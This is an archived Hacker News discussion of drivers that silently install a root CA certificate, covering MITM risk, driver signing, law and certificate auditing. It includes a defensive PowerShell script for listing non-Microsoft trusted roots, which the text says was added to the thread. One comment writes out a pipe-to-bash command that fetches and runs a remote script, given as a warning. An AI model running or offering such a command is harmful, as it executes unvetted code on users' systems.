
Savitech USB audio drivers install a new root CA certificate - finnn
https://www.kb.cert.org/vuls/id/446847
======
ryan-c
The "Universal ADB Driver" for Android devices[1] also installs a root CA,
however it instead generates the CA during install, signs the driver, deletes
the private key, then installs the CA and driver.

1. [https://github.com/koush/UniversalAdbDriver](https://github.com/koush/UniversalAdbDriver)

~~~
hamandcheese
What good is a root CA with no key?

~~~
xgbi
It is actually clever:

- generate a fake CA and use it to sign your driver on the fly;

- add the generated root CA to the trusted list;

- delete the private key so that nobody else can sign anything with this CA;

- now Windows will happily consider this driver as worthy of trust and
install it.

~~~
TylerE
That sounds very un-clever (edit: I mean by Microsoft). Why couldn't malware
do the exact same thing?

~~~
tialaramex
It absolutely could. The alternative is that Microsoft has complete control
over what software can run on any Windows PC. It turns out that people who
want this ("Man. I wish I could only run programs chosen by the monopoly
supplier") already have an iPad so this basically just creates a backlash.

I know what you're thinking "Oh, well there could be an exception for when you
need it, you'd just use admin to authorize it or something" and that's exactly
what this is.

~~~
fencepost
> The alternative is that Microsoft has complete control over what software
> can run on any Windows PC.

That would be the relatively little known (and new) Windows 10 S, where only
apps from the Windows Store can be installed or run. Designed for security (?)
and to compete with Chromebooks.

See also Windows RT

~~~
m-p-3
I can see some scenarios where this would be desirable. Like my grandparents,
who basically just want to browse Facebook, etc.

Since they have a Chromebox, I do not have any calls regarding viruses or
their computer being slow, etc.

~~~
Spivak
But the desirability is proportional to the level of moderation of the store
and Microsoft's is complete shit: it's full of not-quite-malware and not-
quite-scams.

------
userbinator
I am not saddened by this event, but by the fact that such occurrences will
only add momentum to the movement to lock down computing devices and take
freedom away from their users:

[https://news.ycombinator.com/item?id=12061320](https://news.ycombinator.com/item?id=12061320)

Those worrying about security should remember that device drivers already run
in ring 0 and can do anything they damn well please.

Thus I say: Good on Savitech for not being afraid to rebel against; and
fuckings to the corporatocracy that is certificate authorities and the
authoritarian security industry.

~~~
TeMPOraL
I do not know what to do anymore.

I am with you here, as I've been for many years (you link to a comment of
yours that links to a comment of mine, for that effect). I'm even fond of
saying, "security vs. fun - pick one". But I start to increasingly understand
the arguments from the other side.

Consider: what I consider an essential "fun" of computing is being able to
alter software running on my machine as I see fit. If I want to make it so
that Windows Notepad is pink, or supports Emacs shortcuts, I should be able to
mess with both binary on my hard drive _and_ running process in memory,
because it's my computer and my rules. But the same mechanisms allow an evil
person to make _my mother's_ Notepad look like her e-mail account login
screen and exfiltrate data from that. I dream of having an OS as malleable and
tightly integrated as Lisp Machines were, but I wouldn't dare connect it to
the Internet these days.

So what can one do? How to approach it? Is there even a way to create a
computer that both respects the end-user as its rightful owner and can be
safely used to conduct business and pleasure on-line? I honestly don't know if
this is even possible in principle. If it is, I would appreciate being pointed
towards possible solutions, because this - I believe - is a case worth
fighting for.

~~~
jsmthrowaway
The problem is that “end-user” means two very different things. Most hackers
still think of “end-user” as you and me (note the answers you’re getting), and
this is why Free Software is losing battles left and right, particularly in
mobile. Stallman’s comments re: iPhone, for example, demonstrate that as an
industry and advocacy group we still don’t _really_ understand this.

We have to accept that those who _need_ rigid, inflexible computing to protect
them far outnumber us. People don’t care if they can rewrite Notepad or read
its source code, they care that Facebook works and that they don’t get viruses
or added to a botnet. The _only_ way to develop a healthy advocacy here is to
understand that the hacker ideals and customizability that we expect of a
computing system really make us a vanishing minority and acknowledging that
for the now-average user, those ideals make less and less sense as time goes
on. We had our run, then everybody else found computers. Times change. It’s
not bad.

Is there a way to create your computer? For us, probably. For them, I’m
increasingly believing it isn’t. This isn’t a knock against anyone, just an
acknowledgment that there are almost certainly two answers to this question
and Free Software ideals and beliefs aren’t equipped to handle the much, much
larger answer. Proprietary operating systems, walled gardens, Internet
centralization, it plays toward all of the ideals Free Software has been
holding dear for decades. We have to evolve our thinking, I’m afraid. The less
we acknowledge that perhaps Free Software is wrong for the average user, the
less we will have a voice at the table; eventually, nobody will listen at all.

Hell, many cars don’t even allow you to work on them any more. Look at Teslas,
higher-end Audis, etc. I offered to change my neighbor’s oil in his Audi and
he got scared about his warranty.

~~~
TeMPOraL
Heh.

It's good you brought up cars, as they're a perfect example of conflicting
needs. Cars are now computers on wheels, and while I'd love to drive a car I
personally modded at firmware level, I would also be against allowing such
cars on public roads. One, hackers make mistakes, and two, malicious actors
would trick regular people into modding their cars to further their malicious
goals. Both reasons create public hazard. Which is obvious in case of cars,
but less obvious with computers connected to the Internet.

At this point I fear we might need to fork computing entirely - let the
regular users live in "hell" of proprietary, locked down _services_ they don't
actually own, while ourselves, we get the "heaven" of free software... that's
pretty much not allowed to interact with regular users. I don't see how to
keep the two worlds as one, because all features meant for hackers can also be
used by malicious actors to pwn people.

Consider e.g. dev console in a web browser. All is cool, because regular users
don't know what F12 does and wouldn't even think of pressing it. But then
Facebook and others have to put Self-XSS measures into place, because a
malicious actor can _tell_ a regular user what F12 does, and how it "can" let
them see who viewed their Facebook profile...

I hate the idea of split world. It means I won't be able to e.g. automate my
banking or pizza delivery, because those things will have to go through "dumb"
computing, to avoid self-pwnage risks. It means that eventually I won't be
able to even get a general-purpose computer, because the nature of niche
markets is that they generally _don't_ get served with good stuff at
accessible prices - they either get served at exorbitant prices, or don't get
served at all.

So I don't want that split world. I want an alternative to fight for. But as I
previously wrote, I can't see any.

~~~
digi_owl
I am of two minds of such a split world, as all too often it means that when a
geek is called on to fix something for the rest of us, they invariably can't
because they can't get the right access.

Never mind that I fear that the black hats of the world will always find a way
to break the sandbox of the "safe" computers, and thus we are effectively
fucked. Because now they have access on a level the rest of us do not, and
thus can't counter their actions.

BTW, I do believe Cory Doctorow has done a couple of speaking tours on this
under the titles "The coming war on general purpose computing" and "The coming
civil war on general purpose computing".

The first being about government demands for a computer that does everything but
some naughty action, and the second about well meaning geeks locking down
computers to make them "safer".

------
Osiris
Why does Windows allow programs to install root CA certs without separate user
intervention (beyond the initial "grant admin permissions" dialog)?

~~~
throwaway130917
Maybe it's time for desktop operating systems to adopt permissions systems
like smartphones. Permission for network access, permission for non-current
user files and registry, permission to install certs.

~~~
wvenable
The problem is how do you educate users on these prompts.

On smartphones permissions are pretty obvious (Camera, Contacts, Location,
Pictures) but even they sometimes have consequences beyond the obvious.

How would one even begin to word a certificate store permission so that
the average person would understand the consequences of it?

~~~
tonmoy
I consider myself tech savvy (by no means do I understand that much more than
an average user). When I tried to enable my company’s mail on my personal
iPhone, I was prompted to install a certificate. In my haste I thought it was
just a certificate for *.my-company.com domains, but iPhone showed me a
message in the likes of “the owner of the certificate would be able to
read/modify all my network communication, monitor/install/uninstall all apps I
have... “ and so on. That was enough to stop me in my tracks and now I’m
waiting for a company phone instead.

~~~
fencepost
That's pretty common, and is one of the reasons for some of the third party
exchange clients on Android devices. At least one of the early ones (Nitro?)
maintained its own separate data store for email and possibly other things so
that when policies were used to wipe data it could wipe only the data in that
app instead of the entire device.

The counter to that is that now I believe there are a bunch of Exchange
clients on Android that will simply ignore server policy or where handling of
policy can be controlled in the settings, which kind of defeats the point.

The original point of all those policies was to be able to erase supposedly
secure content if the device was lost or if someone left the company for
whatever reason.

Edit: the Exchange client I was thinking of is TouchDown, now owned (and
EOLed) by Symantec but I believe originally from NitroDesk.

------
walrus01
I would honestly be more worried about the root CAs which are enabled by
default in the most popular OSes and browsers, with root CA privileges for
government of China controlled entities, Turkish government entities and
unethical/shoddy root CAs such as Symantec. The Netherlands recently passed a
law allowing the government specifically to use false keys and run MITM on
crypto, which brings into question all .NL based CAs.

~~~
rvanmil
Do you have a reference to this law in The Netherlands?

~~~
rocqua
There is an upcoming advisory (i.e. non-binding) referendum about this law
coming up. Specifically, the referendum is about reversing the law.

Notably, some parties in the newly minted government have declared their
intention to ignore the referendum. They back this by two arguments "It is
needed for security" and "We are going to remove the advisory referendum
anyway, so we get to ignore this one".

That second point is kind of interesting, because the referendum is possible
due to a rather new law. We had one before that went rather poorly, so now we
want to get rid of it.

The actual law is here [1]; this site [2] advocates for the referendum. I'm
afraid I don't know of any English sources.

Quoting from the law, and applying my own translation

>>

Article 45. Member 1

The services are authorized to:

a. (Basically, do exploratory searches of networks)

b. Use false signals, false keys, false identity or intervention by third
parties to gain access to automated systems. This can be done with the help of
technical tooling.

Article 45. Member 2

The authorization from member 1b above also authorizes:

a. The defeating of any security measures

b. Installing technical measures to reverse encryption on data stored or
processed by automated systems.

c. (references article 40)

d. To copy data stored or processed by an automated system.

Article 45 Member 2 (summarized, the government needs to give written
permission for any of the above to happen)

>>

This seems to be the referenced passage based on a preliminary search.

[1] [https://zoek.officielebekendmakingen.nl/kst-34588-A.html](https://zoek.officielebekendmakingen.nl/kst-34588-A.html)

[2] [https://sleepwet.nl/](https://sleepwet.nl/)

~~~
rvanmil
Thanks, I did not realize the “sleepwet” also authorized defeating encryption.

------
brian-armstrong
So this is a CFAA violation, right? When will we finally hold someone
accountable for blatant security issues like this?

~~~
somebodynew
In this specific case (installing a root certificate) I would say it's not
actually a CFAA violation because they're not "obtaining information",
"defrauding", or "intentionally causing damage". You might be able to argue
that installing the driver on a "government computer" produces a violation of
18 USC 1030 (a) (3), but the rules for a mere "protected computer" which
covers most internet-connected personal computers are actually not strict
enough to cover this.

[https://www.law.cornell.edu/uscode/text/18/1030](https://www.law.cornell.edu/uscode/text/18/1030)

~~~
nkw
"Whoever [...] knowingly causes the transmission of a program, information,
code, or command, and as a result of such conduct, intentionally causes damage
without authorization, to a protected computer [...] shall be punished as
provided in subsection (c) of this section."

"[T]he term 'protected computer' means a computer [...] which is used in or
affecting interstate or foreign commerce or communication, including a
computer located outside the United States that is used in a manner that
affects interstate or foreign commerce or communication of the United States"

"[T]he term 'damage' means any impairment to the integrity or availability of
data, a program, a system, or information"

~~~
justinjlynn
Law is a different language. While it may read like computer code; it isn't.
Well, it is but it's as if "goto" and ";" had different meanings depending not
only on the last keyword used, but also on the mood of the computer. I wish a
straightforward reading was possible but it's often not.

~~~
nkw
Some parts of the law are easier to appreciate if one considers vagueness and
ambiguity can be features instead of bugs.

~~~
rocqua
Those exact ambiguous laws are the ones that are abused most easily. There is
a hard balance between being general enough to cover bad things, without being
so general as to allow authorities to prosecute anyone on some charge.

------
joosters
It seems unacceptable to me that the updated drivers do not automatically
uninstall the CA. How is an ordinary user meant to navigate the certificate
store and delete the CA?

------
edejong
Phrased differently: the Microsoft Windows operating system allows silent
installation of a root certificate during the installation of an unrelated USB
driver, despite featuring a micro-kernel design.

------
elbigbad
Can someone explain root certificates to me and why this is an issue? I know
they sign certificates with a private key at a high level, but don't get the
implications of that generally.

~~~
arkadiyt
Anyone who installed this audio driver could have all their https traffic
intercepted by Savitech.

~~~
elbigbad
Does this mean savitech needs to hypothetically set up some mitm attack
somewhere and wait for you to send traffic, then they can decrypt and read, or
does it mean that they can do that direct from your computer by virtue of that
root certificate?

~~~
xythobuz
They would need to MITM you somewhere, but that could probably happen in their
audio driver that's already installed and running on the target machine.

------
grandalf
Is there software that will check the certs on my computers to make sure no
software has done this?

~~~
revelation
Well you can look at the certificate store by running certmgr.msc, but it's a
dangerous game - do you trust Go Daddy, COMODO or Symantec any more than you
do Savitech? They have all at one point or another given reason to not even
entrust them with organising a piss-up in a brewery.

Other applications like Firefox have their own independent root CA store.

~~~
tialaramex
Mmm. I think the brewery test is an unfair comparison. Our problem is not that
the major CAs are hopeless. If they were hopeless we'd have abandoned PKIX
years ago. Instead the problem is that they're good but not as good as we'd
like.

We are looking for somebody who can run aforesaid event fifty times a year for
the general public without anybody falling in any of the machinery. In
hindsight drunk people in an industrial workplace was a mistake, and so we can
and should demand they do their best to make it safe, but perfection just
isn't to be expected.

------
drzaiusapelord
>Microsoft provides guidance on deleting and managing certificates in the
Windows certificate store

Microsoft should mark these as malicious and quarantine them using their
built-in AV. If the end user needs them he can remove them from quarantine.
Posting advisories no end user will ever see isn't helping much.

------
revelation
The only version of Windows XP that enforces driver signing is the unicorn 64
bit one, surely they didn't develop the driver for that?

And what kind of odds do I get on the certs having an EKU for anything but
driver signing?

------
ArchReaper
Why are they allowed to bundle malware in their drivers? Why is this not
illegal?

~~~
kevindqc
A CA certificate by itself is not malware? Am I missing something?

~~~
steeleduncan
Malware is certainly a strong term, and generally the definition seems to
include computer code, which would exclude installing a certificate.

However, once you have installed your own root CA certificate on a computer,
you can read all HTTPS traffic originating from that computer, and fake
responses. Likely, thanks to having installed that certificate you can read
someone's emails, move money out of their bank account, and view any files they
have stored online.

The effect of installing a certificate is broadly similar to the effect of
installing a keylogger, and in neither case have you been given a right to do
so. In both cases you have altered someone's computer in such a way that you
are able to read their encrypted communications, which is certainly in the
spirit of what malware means to me.

I'm sure that the intent in this case was not malicious, but we would not
accept software installing a keylogger because they wish to measure your
typing speed, and we should not accept this.

~~~
ArchReaper
>I'm sure that the intent in this case was not malicious

What other explanation is there? Is there a valid reason for an audio driver
to silently install a CA cert?

~~~
tialaramex
As described above, some versions of Windows require drivers to be signed
proving who made them. For this to work Windows needs a list of CAs trusted to
issue the certificates. Whether "I am not paying somebody £100 for a cert"
constitutes a valid reason is arguable. But that seems to have been their plan
here.

------
xstartup
Alright, so if we get tons of installs of our root CA cert, can we start a new
CA?

~~~
toast0
Yes, but CAs can charge money based on (more or less) number of CA root cert
installations on the target devices for a company.

Some of your competitors have had their current root certs preinstalled in
devices for a lot longer than you. Entrust and GlobalSign have 2048 bit
roots with Not Before before 2000.

If I'm going to go with a Johnny come lately root, I may as well use
LetsEncrypt because it doesn't cost money. Also, audio drivers may get you
desktop share, but getting into the platform store on mobile is a lot harder.

~~~
tialaramex
The major trust stores partition their trust of a root by purpose. So
Microsoft's trust of a particular root for signing certs that are used in
driver code signing is separate from not only Apple's trust of same but also
Microsoft's trust of that root for signing TLS certificates. Let's Encrypt
doesn't ask for any "trust bits" besides the Web PKI, ie TLS certificates and
that's completely deliberate.

Purposes other than TLS server and /maybe/ S/MIME are not subject to any
meaningful public oversight, you are entirely trusting Microsoft. Which for
drivers, or Xbox games is probably fine but it's worth keeping in the back of
your mind.

------
pfarnsworth
Is there a list of trusted CA certs that we could use to scan to see if we
have any that may not be trusted?

~~~
herf
You can use sigcheck -tv (sysinternals) to test against Microsoft's list.

I prefer RCC (root certificate checker) and have used it in the past, but the
website seems to be suspended.
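A defender-side check along the lines of the questions above (grandalf asking how to verify nothing has added a root to the machine, pfarnsworth asking for a list to compare against, and revelation's question about which EKUs a root carries), as an added PowerShell example that is not from the thread and is not part of sigcheck or RCC. It assumes Windows PowerShell 5 or later run elevated, and uses the AuthRoot store (Microsoft's auto-updated root list) as a heuristic proxy for the trusted list; a few Microsoft-owned roots live only in Root, so the output needs review rather than blind deletion.

```powershell
# Added example: list machine-wide trusted roots that are NOT in AuthRoot
# (Microsoft's auto-updated root list) and show each one's Enhanced Key Usage.
# Heuristic only: some Microsoft roots also appear only in Root. Review, don't
# delete blindly.

$authRootThumbprints = Get-ChildItem -Path Cert:\LocalMachine\AuthRoot |
    Select-Object -ExpandProperty Thumbprint

function Get-NonMicrosoftRoots {
    param([string]$StorePath)
    Get-ChildItem -Path $StorePath |
        Where-Object { $authRootThumbprints -notcontains $_.Thumbprint } |
        ForEach-Object {
            # EnhancedKeyUsageList is PowerShell's view of the EKU extension.
            $eku = $_.EnhancedKeyUsageList | ForEach-Object { $_.FriendlyName }
            [pscustomobject]@{
                Store      = $StorePath
                Subject    = $_.Subject
                Thumbprint = $_.Thumbprint
                NotBefore  = $_.NotBefore
                NotAfter   = $_.NotAfter
                # No EKU extension means the root is trusted for every purpose,
                # TLS server authentication included, not just code signing.
                Purposes   = if ($eku) { $eku -join ', ' } else { '<all purposes>' }
            }
        }
}

# Machine store (what a driver installer running as admin writes to) and the
# current user's store (writable without admin). Newest roots first, since a
# recently added root is the more likely candidate.
$findings = @(Get-NonMicrosoftRoots -StorePath 'Cert:\LocalMachine\Root') +
            @(Get-NonMicrosoftRoots -StorePath 'Cert:\CurrentUser\Root')

$findings | Sort-Object NotBefore -Descending | Format-Table -AutoSize

# To remove a root you have confirmed as unwanted, take the thumbprint from the
# listing above (placeholder below, not a real value):
# Remove-Item -Path 'Cert:\LocalMachine\Root\<THUMBPRINT_FROM_LISTING>'
```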

------
obituary_latte
Curious as to why EMC got notified 20 days before anyone else...

------
arca_vorago
One more reason to add to the innumerable list of why not to use windows.

~~~
djsumdog
A bad actor could just as easily post a script as "Show HN" with some cool
stuff in it that you install via:

    curl https://example.com/some_script.sh | bash

A lot of people don't check those. Use the non-OSS nvidia or ATI drivers? You
have binary blobs (don't for ATI btw, the OSS ones are 10x better). Use
bluetooth/Wi-Fi on Linux, congratulations you are using closed binary blobs.

I still love Linux, but I don't hate windows. We're not in the 90s. Bill Gates
isn't master of the Borg.

~~~
arca_vorago
I think you underestimate the insidiousness of such systems, and your response
is completely logically fallacious, and doesn't support your conclusion
whatsoever. So if I installed a random script via curl (I prefer wget) and
because there are still some proprietary hardware that needs closed source
binary blobs... That suddenly means GNU/Linux and windows are on the same
footing? No, not at all, and I'm tired of hearing that trite and clichéd
response. The four freedoms matter.

No, it's not the 90s. Now it's worse!

------
fiatjaf
This, and all other thousands of cases of malware in the universe should mean
something for those who defend "native" apps over webapps.

~~~
dawnbreez
Including the various browser-based javascript malwares?

~~~
fiatjaf
I want to know more about that.

